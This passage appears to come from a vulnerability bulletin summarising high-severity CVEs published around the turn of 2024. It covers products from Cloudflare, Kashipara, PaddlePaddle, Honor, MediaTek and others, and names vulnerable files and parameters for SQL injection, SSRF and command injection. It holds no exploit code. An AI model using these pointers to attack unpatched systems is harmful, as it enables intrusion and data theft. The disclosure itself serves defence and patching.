cloudflare,_inc. — miniflare Sending specially crafted HTTP requests to Miniflare’s server could result in arbitrary HTTP and WebSocket requests being sent from the server. If Miniflare was configured to listen on external network interfaces (as was the default in wrangler until 3.19.0), an attacker on the local network could access other local servers. 2023-12-29 8.1 CVE-2023-7078
cna@cloudflare.com
cloudflare,_inc. — wrangler The V8 inspector intentionally allows arbitrary code execution within the Workers sandbox for debugging. wrangler dev would previously start an inspector server listening on all network interfaces. This would allow an attacker on the local network to connect to the inspector and run arbitrary code. Additionally, the inspector server did not validate Origin/Host headers, granting an attacker that can trick any user on the local network into opening a malicious website the ability to run code. If wrangler dev --remote was being used, an attacker could access production resources if they were bound to the worker. This issue was fixed in wrangler@3.19.0 and wrangler@2.20.2. Whilst wrangler dev’s inspector server listens on local interfaces by default as of wrangler@3.16.0, an SSRF vulnerability in miniflare https://github.com/cloudflare/workers-sdk/security/advisories/GHSA-fwvg-2739-22v7 (CVE-2023-7078) allowed access from the local network until wrangler@3.18.0. wrangler@3.19.0 and wrangler@2.20.2 introduced validation for the Origin/Host headers. 2023-12-29 8 CVE-2023-7080
cna@cloudflare.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been classified as problematic. Affected is an unknown function of the file /admin/update-clients.php. The manipulation of the argument uid leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249144. 2023-12-29 9.8 CVE-2023-7141
cna@vuldb.com
code-projects — client_details_system A vulnerability was found in code-projects Client Details System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/clientview.php. The manipulation of the argument ID leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249145 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7142
cna@vuldb.com
code-projects — college_notes_gallery A vulnerability has been found in code-projects College Notes Gallery 2.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file login.php. The manipulation of the argument user leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249133 was assigned to this vulnerability. 2023-12-31 8.8 CVE-2023-7130
cna@vuldb.com
codeastro — online_food_ordering_system A vulnerability classified as critical was found in CodeAstro Online Food Ordering System 1.0. This vulnerability affects unknown code of the file /admin/ of the component Admin Panel. The manipulation of the argument Username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-249778 is the identifier assigned to this vulnerability. 2024-01-05 7.3 CVE-2024-0247
cna@vuldb.com
coolkit_technology — ewelink-smart_home_for_android_and_ios Improper privilege management vulnerability in CoolKit Technology eWeLink on Android and iOS allows application lockscreen bypass. This issue affects eWeLink before 5.2.0. 2023-12-30 7.7 CVE-2023-6998
cvd@cert.pl
dedebiz — dedebiz A vulnerability was found in Muyun DedeBIZ up to 6.2.12 and classified as critical. Affected by this issue is some unknown functionality of the component Add Attachment Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249368. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-30 7.2 CVE-2023-7181
cna@vuldb.com
documize — documize SQL Injection vulnerability in Documize version 5.4.2, allows remote attackers to execute arbitrary code via the user parameter of the /api/dashboard/activity endpoint. 2023-12-29 9.8 CVE-2023-23634
cve@mitre.org
easy-rules-mvel — easy-rules-mvel easy-rules-mvel v4.1.0 was discovered to contain a remote code execution (RCE) vulnerability via the component MVELRule. 2023-12-29 7.8 CVE-2023-50571
cve@mitre.org
ekol_informatics — website_template Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in Ekol Informatics Website Template allows SQL Injection. This issue affects Website Template: through 20231215. 2024-01-02 9.8 CVE-2023-6436
iletisim@usom.gov.tr
embras — geosiap_erp Grupo Embras GEOSIAP ERP v2.2.167.02 was discovered to contain a SQL injection vulnerability via the codLogin parameter on the login page. 2023-12-30 9.8 CVE-2023-50589
cve@mitre.org
flarum — flarum Flarum is open source discussion platform software. Prior to version 1.8.5, the Flarum `/logout` route includes a redirect parameter that allows any third party to redirect users from a (trusted) domain of the Flarum installation to any link. For logged-in users, the logout must be confirmed. Guests are immediately redirected. This could be used by spammers to redirect to a web address using a trusted domain of a running Flarum installation. The vulnerability has been fixed and published as flarum/core v1.8.5. As a workaround, some extensions modifying the logout route can remedy this issue if their implementation is safe. 2024-01-05 7.5 CVE-2024-21641
security-advisories@github.com
follow-redirects — follow-redirects Versions of the package follow-redirects before 1.15.4 are vulnerable to Improper Input Validation due to the improper handling of URLs by the url.parse() function. When new URL() throws an error, it can be manipulated to misinterpret the hostname. An attacker could exploit this weakness to redirect traffic to a malicious site, potentially leading to information disclosure, phishing attacks, or other security breaches. 2024-01-02 7.3 CVE-2023-26159
report@snyk.io
froxlor — froxlor Froxlor is open source server administration software. Prior to version 2.1.2, it was possible to submit the registration form with the essential fields, such as the username and password, left intentionally blank. This inadvertent omission allowed for a bypass of the mandatory field requirements (e.g. surname, company name) established by the system. Version 2.1.2 fixes this issue. 2024-01-03 7.5 CVE-2023-50256
security-advisories@github.com
gm_information_technologies — multi-disciplinary_design_optimization Improper Neutralization of Special Elements used in an SQL Command (‘SQL Injection’) vulnerability in GM Information Technologies MDO allows SQL Injection. This issue affects MDO: through 20231229.  NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-29 9.8 CVE-2023-4675
iletisim@usom.gov.tr
google — android In Modem IMS Call UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161825; Issue ID: MOLY01161825 (MSV-895). 2024-01-02 7.5 CVE-2023-32889
security@mediatek.com
google — google_nest_mini An attacker in the wifi vicinity of a target Google Home can spy on the victim, resulting in Elevation of Privilege  2024-01-02 10 CVE-2023-48419
dsap-vuln-management@google.com
google — pixel_watch In checkDebuggingDisallowed of DeviceVersionFragment.java, there is a possible way to access adb before SUW completion due to an insecure default value. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation. 2024-01-02 10 CVE-2023-48418
dsap-vuln-management@google.com
google — pixel_watch There is a possible information disclosure due to a missing permission check. This could lead to local information disclosure of health data with no additional execution privileges needed. 2024-01-02 8.4 CVE-2023-4164
dsap-vuln-management@google.com
google — wifi_pro Google Nest WiFi Pro root code-execution & user-data compromise 2024-01-02 10 CVE-2023-6339
dsap-vuln-management@google.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by path traversal arbitrary file read vulnerability because it uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory.  The product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory. Potential exploits can completely disrupt or take over the application. 2024-01-03 8.8 CVE-2023-45722
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics product is impacted by unauthenticated file upload vulnerability. The web application permits the upload of a certain file without requiring user authentication. 2024-01-03 8.2 CVE-2023-45724
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Improper Access Control (Controller APIs) vulnerability. Certain API endpoints are accessible to Customer Admin Users that can allow access to sensitive information about other users. 2024-01-03 8.3 CVE-2023-50343
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by the use of a broken cryptographic algorithm for encryption, potentially giving an attacker ability to decrypt sensitive information. 2024-01-03 8.2 CVE-2023-50350
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by the use of an insecure key rotation mechanism which can allow an attacker to compromise the confidentiality or integrity of data. 2024-01-03 8.2 CVE-2023-50351
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by path traversal vulnerability which allows file upload capability.  Certain endpoints permit users to manipulate the path (including the file name) where these files are stored on the server. 2024-01-03 7.6 CVE-2023-45723
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by Improper Access Control (Obsolete web pages) vulnerability. Discovery of outdated and accessible web pages, reflects a “Missing Access Control” vulnerability, which could lead to inadvertent exposure of sensitive information and/or exposing a vulnerable endpoint. 2024-01-03 7.6 CVE-2023-50341
psirt@hcl.com
hcl_software — dryice_myxalytics HCL DRYiCE MyXalytics is impacted by an Insecure Direct Object Reference (IDOR) vulnerability.  A user can obtain certain details about another user as a result of improper access control. 2024-01-03 7.1 CVE-2023-50342
psirt@hcl.com
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23427
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23428
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23429
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by signature management vulnerability; successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23435
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by signature management vulnerability; successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23436
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-23442
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-23443
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability; successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51426
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51427
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_os Some Honor products are affected by type confusion vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51428
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by buffer overflow vulnerability, successful exploitation could cause code execution. 2023-12-29 7.8 CVE-2023-51434
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magic_ui Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause information leak. 2023-12-29 7.1 CVE-2023-51435
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — magichome Some Honor products are affected by incorrect privilege assignment vulnerability, successful exploitation could cause device service exceptions. 2023-12-29 7.5 CVE-2023-23430
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by file writing vulnerability, successful exploitation could cause code execution 2023-12-29 9.8 CVE-2023-23424
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability; successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23431
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability; successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23432
3836d913-7555-4dd0-a509-f5667fdf5fe4
hihonor — nth-an00_firmware Some Honor products are affected by signature management vulnerability; successful exploitation could cause the forged system file to overwrite the correct system file. 2023-12-29 7.1 CVE-2023-23433
3836d913-7555-4dd0-a509-f5667fdf5fe4
hitachi_energy — rtu500_series_cmu_firmware A vulnerability exists in the HCI Modbus TCP function included in the product versions listed above. If the HCI Modbus TCP is enabled and configured, an attacker could exploit the vulnerability by sending a specially crafted message to the RTU500 in a high rate, causing the targeted RTU500 CMU to reboot. The vulnerability is caused by a lack of flood control which eventually if exploited causes an internal stack overflow in the HCI Modbus TCP function. 2024-01-04 7.5 CVE-2022-2081
cybersecurity@hitachienergy.com
hospital_management_system — hospital_management_system A vulnerability, which was classified as critical, has been found in PHPGurukul Hospital Management System 1.0. Affected by this issue is some unknown functionality of the component Admin Dashboard. The manipulation leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249356. 2023-12-30 7.3 CVE-2023-7172
cna@vuldb.com
jeecg — jeecg_boot SQL injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the jmreport/qurestSql component. 2023-12-30 9.8 CVE-2023-41542
cve@mitre.org
jeecg — jeecg_boot SQL injection vulnerability in jeecg-boot v3.5.3, allows remote attackers to escalate privileges and obtain sensitive information via the component /sys/replicate/check. 2023-12-30 9.8 CVE-2023-41543
cve@mitre.org
jeecg — jeecg_boot SSTI injection vulnerability in jeecg-boot version 3.5.3, allows remote attackers to execute arbitrary code via crafted HTTP request to the /jmreport/loadTableData component. 2023-12-30 9.8 CVE-2023-41544
cve@mitre.org
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘itemnameid’ parameter of the material_bill.php?action=itemRelation resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49622
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘cancelid’ parameter of the material_bill.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49624
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘id’ parameter of the partylist_edit_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49625
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘buyer_address’ parameter of the buyer_detail_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49633
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘customer_details’ parameter of the buyer_invoice_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49639
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘bank_details’ parameter of the party_submit.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49658
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘quantity[]’ parameter of the submit_delivery_list.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49665
help@fluidattacks.com
kashipara_group — billing_software Billing Software v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘custmer_details’ parameter of the submit_material_list.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-49666
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘dd’ parameter of the registration.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50743
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘e’ parameter of the login.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50752
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘dd’ parameter of the user/update_profile.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50753
help@fluidattacks.com
kashipara_group — online_notice_board_system Online Notice Board System v1.0 is vulnerable to an Insecure File Upload vulnerability on the ‘f’ parameter of user/update_profile_pic.php page, allowing an authenticated attacker to obtain Remote Code Execution on the server hosting the application. 2024-01-04 8.8 CVE-2023-50760
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelIDHidden’ parameter of the booking.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50862
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelIDHidden’ parameter of the generateReceipt.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50863
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘hotelId’ parameter of the hotelDetails.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50864
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘city’ parameter of the hotelSearch.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50865
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the loginAction.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50866
help@fluidattacks.com
kashipara_group — travel_website Travel Website v1.0 is vulnerable to multiple Unauthenticated SQL Injection vulnerabilities. The ‘username’ parameter of the signupAction.php resource does not validate the characters received and they are sent unfiltered to the database. 2024-01-04 9.8 CVE-2023-50867
help@fluidattacks.com
laf — laf Laf is a cloud development platform. In the Laf version design, the log uses communication with k8s to quickly retrieve logs from the container without the need for additional storage. However, in version 1.0.0-beta.13 and prior, this interface does not verify the permissions of the pod, which allows authenticated users to obtain any pod logs under the same namespace through this method, thereby obtaining sensitive information printed in the logs. As of time of publication, no known patched versions exist. 2024-01-03 9.6 CVE-2023-50253
security-advisories@github.com
lenovo — universal_device_client Uncontrolled search path vulnerabilities were reported in the Lenovo Universal Device Client (UDC) that could allow an attacker with local access to execute code with elevated privileges. 2024-01-03 7.8 CVE-2023-6338
psirt@lenovo.com
linux — kernel A flaw was found in the ATA over Ethernet (AoE) driver in the Linux kernel. The aoecmd_cfg_pkts() function improperly updates the refcnt on `struct net_device`, and a use-after-free can be triggered by racing between the free on the struct and the access through the `skbtxq` global queue. This could lead to a denial-of-service condition or potential code execution. 2024-01-04 7 CVE-2023-6270
secalert@redhat.com
linux — kernel A use-after-free flaw was found in the netfilter subsystem of the Linux kernel. If the catchall element is garbage-collected when the pipapo set is removed, the element can be deactivated twice. This can cause a use-after-free issue on an NFT_CHAIN object or NFT_OBJECT object, allowing a local unprivileged user with CAP_NET_ADMIN capability to escalate their privileges on the system. 2024-01-02 7.8 CVE-2024-0193
secalert@redhat.com
man-group — dtale D-Tale is a visualizer for Pandas data structures. Users publicly hosting D-Tale versions prior to 3.9.0 can be vulnerable to server-side request forgery (SSRF), allowing attackers to access files on the server. Users should upgrade to version 3.9.0, where the `Load From the Web` input is turned off by default. The only workaround for versions earlier than 3.9.0 is to only host D-Tale to trusted users. 2024-01-05 7.5 CVE-2024-21642
security-advisories@github.com
masterlab — masterlab A vulnerability classified as critical has been found in gopeak MasterLab up to 3.3.10. This affects the function sqlInject of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249147. 2023-12-29 9.8 CVE-2023-7144
cna@vuldb.com
masterlab — masterlab A vulnerability classified as critical was found in gopeak MasterLab up to 3.3.10. This vulnerability affects the function sqlInject of the file app/ctrl/Framework.php of the component HTTP POST Request Handler. The manipulation of the argument pwd leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-249148. 2023-12-29 9.8 CVE-2023-7145
cna@vuldb.com
masterlab — masterlab A vulnerability, which was classified as critical, has been found in gopeak MasterLab up to 3.3.10. This issue affects the function sqlInjectDelete of the file app/ctrl/framework/Feature.php of the component HTTP POST Request Handler. The manipulation of the argument phone leads to sql injection. The exploit has been disclosed to the public and may be used. The identifier VDB-249149 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7146
cna@vuldb.com
masterlab — masterlab A vulnerability, which was classified as critical, was found in gopeak MasterLab up to 3.3.10. Affected is the function base64ImageContent of the file app/ctrl/User.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. VDB-249150 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7147
cna@vuldb.com
masterlab — masterlab A vulnerability was found in gopeak MasterLab up to 3.3.10. It has been declared as critical. Affected by this vulnerability is the function add/update of the file app/ctrl/admin/User.php. The manipulation of the argument avatar leads to unrestricted upload. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-249181 was assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7159
cna@vuldb.com
mattermost — mattermost Mattermost version 2.10.0 and earlier fails to sanitize deeplink paths, which allows an attacker to perform CSRF attacks against the server. 2023-12-29 8.8 CVE-2023-7114
responsibledisclosure@mattermost.com
mediatek — lr13 In Modem IMS Stack, there is a possible out of bounds write due to a missing bounds check. This could lead to remote code execution with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161803; Issue ID: MOLY01161803 (MSV-893). 2024-01-02 9.8 CVE-2023-32874
security@mediatek.com
mediatek — lr13 In modem EMM, there is a possible system crash due to improper input validation. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01183647; Issue ID: MOLY01183647 (MSV-963). 2024-01-02 7.5 CVE-2023-32890
security@mediatek.com
mediatek — nr15 In Modem IMS SMS UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY00730807; Issue ID: MOLY00730807. 2024-01-02 7.5 CVE-2023-32886
security@mediatek.com
mediatek — nr15 In Modem IMS Stack, there is a possible system crash due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161837; Issue ID: MOLY01161837 (MSV-892). 2024-01-02 7.5 CVE-2023-32887
security@mediatek.com
mediatek — nr15 In Modem IMS Call UA, there is a possible out of bounds write due to a missing bounds check. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation. Patch ID: MOLY01161830; Issue ID: MOLY01161830 (MSV-894). 2024-01-02 7.5 CVE-2023-32888
security@mediatek.com
micropython — micropython A vulnerability, which was classified as critical, has been found in MicroPython 1.21.0/1.22.0-preview. Affected by this issue is the function poll_set_add_fd of the file extmod/modselect.c. The manipulation leads to use after free. The exploit has been disclosed to the public and may be used. The patch is identified as 8b24aa36ba978eafc6114b6798b47b7bfecdca26. It is recommended to apply a patch to fix this issue. VDB-249158 is the identifier assigned to this vulnerability. 2023-12-29 9.8 CVE-2023-7152
cna@vuldb.com
micropython — micropython A vulnerability was found in MicroPython up to 1.21.0. It has been classified as critical. Affected is the function slice_indices of the file objslice.c. The manipulation leads to heap-based buffer overflow. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. Upgrading to version 1.22.0 is able to address this issue. It is recommended to upgrade the affected component. The identifier of this vulnerability is VDB-249180. 2023-12-29 9.8 CVE-2023-7158
cna@vuldb.com
microsoft — python_extension Visual Studio Code Python Extension Remote Code Execution Vulnerability 2023-12-29 7.8 CVE-2020-17163
secure@microsoft.com
misskey — misskey Misskey is an open source, decentralized social media platform. Third-party applications may be able to access some endpoints or Websocket APIs that are incorrectly specified as [kind](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L811) or [secure](https://github.com/misskey-dev/misskey/blob/406b4bdbe79b5b0b68fcdcb3c4b6e419460a0258/packages/backend/src/server/api/endpoints.ts#L805) without the user’s permission and perform operations such as reading or adding non-public content. As a result, if the user who authenticated the application is an administrator, confidential information such as object storage secret keys and SMTP server passwords will be leaked, and general users can also create invitation codes without permission and leak non-public user information. This is patched in version [2023.12.1](https://github.com/misskey-dev/misskey/commit/c96bc36fedc804dc840ea791a9355d7df0748e64). 2023-12-29 9.6 CVE-2023-52139
security-advisories@github.com
mtab — bookmark A vulnerability was found in MTab Bookmark up to 1.2.6 and classified as critical. This issue affects some unknown processing of the file public/install.php of the component Installation. The manipulation leads to improper access controls. The complexity of an attack is rather high. The exploitation is known to be difficult. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249395. NOTE: The vendor was contacted early about this disclosure but did not respond in any way. 2023-12-31 8.1 CVE-2023-7193
cna@vuldb.com
netentsec — application_security_gateway_firmware A vulnerability classified as critical has been found in Netentsec NS-ASG Application Security Gateway 6.3.1. This affects an unknown part of the file index.php?para=index of the component Login. The manipulation of the argument check_VirtualSiteId leads to sql injection. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249183. 2023-12-29 9.8 CVE-2023-7161
cna@vuldb.com
omniauth-microsoft_graph — omniauth-microsoft_graph omniauth-microsoft_graph provides an Omniauth strategy for the Microsoft Graph API. Prior to versions 2.0.0, the implementation did not validate the legitimacy of the `email` attribute of the user nor did it give/document an option to do so, making it susceptible to nOAuth misconfiguration in cases when the `email` is used as a trusted user identifier. This could lead to account takeover. Version 2.0.0 contains a fix for this issue. 2024-01-02 8.6 CVE-2024-21632
security-advisories@github.com
otclient — otclient OTClient is an alternative Tibia client for otserv. Prior to commit db560de0b56476c87a2f967466407939196dd254, the /mehah/otclient “`Analysis – SonarCloud`” workflow is vulnerable to an expression injection in Actions, allowing an attacker to run commands remotely on the runner, leak secrets, and alter the repository using this workflow. Commit db560de0b56476c87a2f967466407939196dd254 contains a fix for this issue. 2024-01-02 9.8 CVE-2024-21623
security-advisories@github.com
paddlepaddle — paddlepaddle Stack overflow in paddle.searchsorted in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, or even more damage. 2024-01-03 9.8 CVE-2023-52304
paddle-security@baidu.com
paddlepaddle — paddlepaddle Stack overflow in paddle.linalg.lu_unpack in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, or even more damage. 2024-01-03 9.8 CVE-2023-52307
paddle-security@baidu.com
paddlepaddle — paddlepaddle Heap buffer overflow in paddle.repeat_interleave in PaddlePaddle before 2.6.0. This flaw can lead to a denial of service, information disclosure, or possibly more damage. 2024-01-03 9.8 CVE-2023-52309
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in get_online_pass_interval. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52310
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in _wget_download. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52311
paddle-security@baidu.com
paddlepaddle — paddlepaddle PaddlePaddle before 2.6.0 has a command injection in convert_shape_compare. This resulted in the ability to execute arbitrary commands on the operating system. 2024-01-03 9.8 CVE-2023-52314
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.nanmedian in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38674
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.linalg.matrix_rank in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38675
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.dot in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38676
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.linalg.eig in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38677
paddle-security@baidu.com
paddlepaddle — paddlepaddle OOB access in paddle.mode in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-38678
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.nextafter in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52302
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr in paddle.put_along_axis in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52303
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.topk in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52305
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.lerp in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52306
paddle-security@baidu.com
paddlepaddle — paddlepaddle FPE in paddle.amin in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52308
paddle-security@baidu.com
paddlepaddle — paddlepaddle Nullptr dereference in paddle.crop in PaddlePaddle before 2.6.0. This flaw can cause a runtime crash and a denial of service. 2024-01-03 7.5 CVE-2023-52312
paddle-security@baidu.com
